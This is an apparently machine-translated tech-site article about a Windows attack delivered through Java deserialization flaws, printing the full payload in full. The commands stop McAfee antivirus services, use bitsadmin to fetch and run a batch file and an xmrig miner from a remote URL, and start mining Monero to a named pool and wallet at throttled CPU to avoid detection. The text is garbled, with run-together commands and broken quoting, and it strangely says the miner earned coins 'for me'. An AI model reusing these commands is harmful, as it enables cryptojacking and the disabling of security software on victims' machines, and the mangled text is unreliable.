Shulou(Shulou.com)06/02 Report--

In this issue, Xiaobian will bring you about how to use Java deserialization vulnerabilities for experiments on Windows. The article is rich in content and analyzes and narrates from a professional perspective. After reading this article, I hope you can gain something.

Recently, there has been a lot of discussion in the security community about exploiting Java deserialization vulnerabilities to attack systems like Apache, SOLR, and LOGY. Let's cut to the chase and get straight to the point. The vast majority of these attacks currently target Linux/Unix systems, but I recently discovered a way to attack Windows.

The attack code is as follows:

cmd /c net stop"McAfee McShield;net stop mcafeeframework;bitsadmin.exe /transfer"xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe /transfer "xmrig.exe"/download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dir xmrig*;xmrig.bat;tasklist;

Actual Payload Analysis

Turn off McAfee antivirus software (I don't understand why this technology in the community only turns off McAfee…):

netstop "McAfee McShield;netstop mcafeeframework;

Download cryptocurrency miners and a batch script file from GitHub using bitsadmin:

bitsadmin.exe/transfer "xmrig.bat" /download /priority foregroundhttp://raw.githubusercontent.com/sirikun/starships/master/xmrig.bat"%cd%\xmrig.bat";bitsadmin.exe/transfer "xmrig.exe" /download /priority foreground http://raw.githubusercontent.com/sirikun/starships/master/xmrig.exe"%cd%\xmrig.exe;dirxmrig*;xmrig.bat;tasklist;

Batch file code is as follows:

taskkill/im /f xmrig.exe /tnetstop "McAfee McShield"netstop mcafeeframeworkxmrig.exe-o monerohash.com:3333 -u 42jF56tc85UTZwhMQc6rHbMHTxHqK74qS2zqLyRZxLbwegsy7FJ9w4T5B69Ay5qeMEMuvVDwHNeopAxrEZkkHrMb5phovJ6-p x --background --max-cpu-usage=50 --donate-level=1

First, the above code terminates other xmrig processes (perhaps to prevent resource contention). Next, it will shut down McAfee. The mining program will then start and connect to the monerohash.com pool (port 3333). It uses only about 50% of CPU resources, presumably to avoid detection.

So far, this miner has only been able to compute 350 hashes per second and has mined 40 Monero coins (worth about $7000) for me.

The above is how to use Java deserialization vulnerabilities to experiment on Windows, if there is a similar doubt, you may wish to refer to the above analysis to understand. If you want to know more about it, please pay attention to the industry information channel.

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.